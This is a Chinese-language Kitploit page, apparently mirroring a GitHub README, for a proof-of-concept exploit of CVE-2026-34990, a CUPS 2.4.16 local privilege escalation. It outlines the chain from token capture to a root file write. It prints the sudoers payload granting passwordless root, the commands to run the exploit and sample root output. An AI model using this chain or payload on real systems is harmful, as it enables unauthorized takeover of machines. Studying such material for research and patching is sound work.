Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34990-CUPS-LPE-PoC — 针对 CVE-2026-34990 的通用 PoC - CUPS 2.4.16 本地权限提升,通过本地令牌泄露和任意 root 文件覆盖实现。 | Kitploit
工具/GitHubGitHub/noorkhalel/cve-2026-34990-cups-lpe-poc
权限提升漏洞分析漏洞利用渗透测试
GitHubnoorkhalel/cve-2026-34990-cups-lpe-poc

CVE-2026-34990-CUPS-LPE-PoC

针对 CVE-2026-34990 的通用 PoC - CUPS 2.4.16 本地权限提升,通过本地令牌泄露和任意 root 文件覆盖实现。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
22天前尚未审核

CVE-2026-34990 | CUPS 本地权限提升 PoC

针对 CVE-2026-34990 的通用概念验证,这是一个影响 CUPS 2.4.16 的本地权限提升漏洞。

该漏洞利用演示了本地非特权用户如何滥用 CUPS 本地认证和打印机配置行为,以 root 身份获得任意文件写入权限并提升权限。

漏洞信息

  • CVE: CVE-2026-34990
  • 组件: CUPS
  • 测试版本: CUPS 2.4.16
  • 类型: 本地权限提升
  • 影响: 以 root 身份任意文件写入
  • 修复版本: CUPS 2.4.17

漏洞致谢

CVE-2026-34990 最初由以下人员报告:

Asim Viladi Oglu Manizada (@manizada)

我不是该漏洞的发现者。

本仓库包含我基于公开披露的技术信息改编并测试的概念验证实现。

工作原理

从高层来看,漏洞利用链如下:

本地非特权用户
        |
        v
创建临时 CUPS 打印机
        |
        v
触发出站 IPP 认证
        |
        v
捕获 Authorization: Local 令牌
        |
        v
对特权 CUPS 操作重用该令牌
        |
        v
创建/持久化 file:// 打印机
        |
        v
提交打印任务
        |
        v
以 root 身份任意文件写入
        |
        v
权限提升

该 PoC 会自动使用当前本地用户名。

例如,当以以下用户执行时:

alice

演示载荷的目标为:

/etc/sudoers.d/alice-pwn

并尝试写入:

alice ALL=(ALL) NOPASSWD: ALL

成功利用后可通过以下命令验证:

sudo -n id

示例:

uid=0(root) gid=0(root) groups=0(root)

环境要求

该 PoC 需要:

  • Linux
  • Python 3
  • 存在漏洞的 CUPS 安装
  • ipptool
  • lp
  • lpstat
  • 对 CUPS 调度器的本地访问权限

检查 CUPS 版本:

cups-config --version

检查调度器是否正在运行:

lpstat -r

检查本地 CUPS 监听端口:

ss -lnt | grep 631

使用方法

克隆仓库:

git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC

运行:

python3 exploit.py

示例输出:

[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn

[+] Local token: <LOCAL_TOKEN>

[*] attempt 1: <printer-name>

[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)

[*] next: sudo -n bash

成功利用后:

sudo -n bash

适用范围

该 PoC 有意编写为公开披露 CVE 的通用实现。

它不包含:

  • CTF 特定信息
  • 训练平台信息
  • 机器名称
  • 凭据
  • Flag
  • 目标 IP 地址
  • 环境特定的机密信息

免责声明

此代码仅供以下用途:

  • 安全研究
  • 漏洞复现
  • 防御性测试
  • 教育目的
  • 授权渗透测试

仅可在您拥有的系统或已获得明确授权的系统上使用此代码。

作者不对本软件的滥用负责。

致谢

漏洞发现:
Asim Viladi Oglu Manizada (@manizada)

PoC 改编、测试与文档:
Noor Khalil

参考资料

  • CVE-2026-34990
  • OpenPrinting CUPS
  • OpenPrinting 安全公告 - GHSA-c54j-2vqw-wpwp
下载工具